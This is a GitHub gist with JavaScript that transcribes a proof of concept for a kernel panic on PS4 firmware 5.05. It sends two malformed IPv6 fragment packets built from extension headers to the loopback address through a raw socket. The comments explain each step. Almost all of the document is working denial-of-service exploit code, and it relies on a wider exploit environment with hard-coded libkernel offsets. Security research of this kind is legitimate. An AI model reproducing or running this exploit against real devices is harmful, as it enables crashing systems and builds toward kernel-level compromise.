@CelesteBlue-dev

CelesteBlue-dev/kpanic_505.js Secret

Created Jan 30, 2021
Transcription of Specter's video stream in which he codes a PS4 FW 5.05 kernel panic PoC based on TheFloW's IP6_EXTHDR_CHECK XNU PoC
window.try_df_crash = function() {
//alert("Your PS4 will have a kernel panic soon...");
// Kernel-panic (crash / denial-of-service) proof of concept: builds two raw
// IPv6 packets made of extension headers and sends them to the local host
// (::1), the second one 3 s after the first. Everything below depends on the
// surrounding exploit environment: p.syscall / p.fcall, p.write1/2/4, read1,
// malloc, stringify, print and window.libKernelBase are all defined elsewhere.
// Socket domain / type / protocol numbers and IPv6 header constants (values as
// used by the target's BSD-derived kernel; not verified here).
var AF_INET6 = 28;
var SOCK_RAW = 3;
var IPPROTO_HOPOPTS = 0;
var IPPROTO_IPV6 = 41;
var IPPROTO_FRAGMENT = 44;
var IPPROTO_ICMPV6 = 58;
var IPPROTO_DSTOPTS = 60;
var IPPROTO_RAW = 255;
var IP6OPT_PADN = 1;
var IP6F_MORE_FRAG = 0x100;
// Debug helper: prints `len` bytes starting at `addr` as hex. Note it is
// assigned without `var`, so it becomes a global; it is never called below.
dumpBytes = function dumpBytes(addr, len) {
var dumpStr = "Dump: ";
for (var i = 0; i < len; i++)
dumpStr += "0x" + read1(addr.add32(i)).toString(16) + " ";
print(dumpStr);
}
// Raw IPv6 socket whose protocol is hop-by-hop options, so the payload handed
// to sendto starts directly with an extension header. The return value is not
// checked for failure (a negative / error value would still be used below).
var sock = p.syscall("sys_socket", AF_INET6,
SOCK_RAW, IPPROTO_HOPOPTS);
print("sock = " + sock. toString(16));
// Destination sockaddr_in6 (0x1C bytes). Only family, port and the address are
// written; sin6_len, sin6_flowinfo and sin6_scope_id keep whatever malloc
// returned — assumes malloc hands back zeroed memory, TODO confirm.
var addr = malloc(0x1C);
p.write1(addr.add32(0x01), AF_INET6); // sockaddr_in6->sin6_family
p.write2(addr.add32(0x02), 0); // sockaddr_in6->sin6_port
// 0x1B510 = inet_pton
// Parses "::1" (loopback) into sockaddr_in6->sin6_addr at offset 0x08; the
// offset is hard-coded for this firmware's libkernel.
p.fcall(window.libKernelBase.add32(0x1B510), AF_INET6, stringify("::1"), addr.add32(0x08));
// Packet 1 (0x18 bytes), pre-filled with 0x41 so untouched bytes are recognisable.
// Layout, read from the writes below (field names are the usual IPv6 extension
// header fields; not independently verified):
//   0x00 hop-by-hop hdr: next header = FRAGMENT, ext len = 0, PadN option (len 4)
//   0x08 fragment hdr:   next header = DSTOPTS, reserved, offset/flags = MORE_FRAG, id 0x1337
//   0x10 dst-opts hdr:   next header = ICMPV6, ext len = 1, PadN option (len 4)
var packet1 = malloc(0x18);
for (var i = 0; i < 0x18; i += 4)
p.write4(packet1.add32(i), 0x41414141);
p.write1(packet1.add32(0x00 + 0x00), IPPROTO_FRAGMENT);
p.write1(packet1.add32(0x00 + 0x01), 0);
p.write1(packet1.add32(0x02 + 0x00), IP6OPT_PADN);
p.write1(packet1.add32(0x02 + 0x01), 4);
p.write1(packet1.add32(0x08 + 0x00), IPPROTO_DSTOPTS);
p.write1(packet1.add32(0x08 + 0x01), 0);
p.write2(packet1.add32(0x08 + 0x02), IP6F_MORE_FRAG);
p.write4(packet1.add32(0x08 + 0x04), 0x1337);
p.write1(packet1.add32(0x10 + 0x00), IPPROTO_ICMPV6);
p.write1(packet1.add32(0x10 + 0x01), 1);
p.write1(packet1.add32(0x12 + 0x00), IP6OPT_PADN);
p.write1(packet1.add32(0x12 + 0x01), 4);
// Packet 2 (0x28 bytes), pre-filled with 0x42. Same first two headers as
// packet 1 except the fragment offset/flags word is 0x800 (MORE_FRAG bit clear)
// with the same id 0x1337, so it presumably pairs with packet 1 in the
// reassembly queue; the third header is a PadN option of length 6.
var packet2 = malloc(0x28);
for (var i = 0; i < 0x28; i += 4)
p.write4(packet2.add32(i), 0x42424242);
p.write1(packet2.add32(0x00 + 0x00), IPPROTO_FRAGMENT);
p.write1(packet2.add32(0x00 + 0x01), 0);
p.write1(packet2.add32(0x02 + 0x00), IP6OPT_PADN);
p.write1(packet2.add32(0x02 + 0x01), 4);
p.write1(packet2.add32(0x08 + 0x00), IPPROTO_DSTOPTS);
p.write1(packet2.add32(0x08 + 0x01), 0);
p.write2(packet2.add32(0x08 + 0x02), 0x800);
p.write4(packet2.add32(0x08 + 0x04), 0x1337);
p.write1(packet2.add32(0x10 + 0x00), IP6OPT_PADN);
p.write1(packet2.add32(0x10 + 0x01), 6);
// First fragment is sent immediately; the return value is only printed.
var rv1 = p.syscall("sys_sendto", sock, packet1, 0x18, 0, addr, 0x1C);
// Second fragment is sent from a timer callback (see setTimeout below).
// Exposed on window so it can also be triggered manually.
window.testFunc = function() {
var rv2 = p.syscall("sys_sendto", sock, packet2, 0x28, 0, addr, 0x1C);
print("rv2 = " + rv2.toString(16));
}
print("rv1 = " + rv1.toString(16));
// 3 s delay between the two sends; the socket is never closed.
setTimeout(window.testFunc, 3000);
}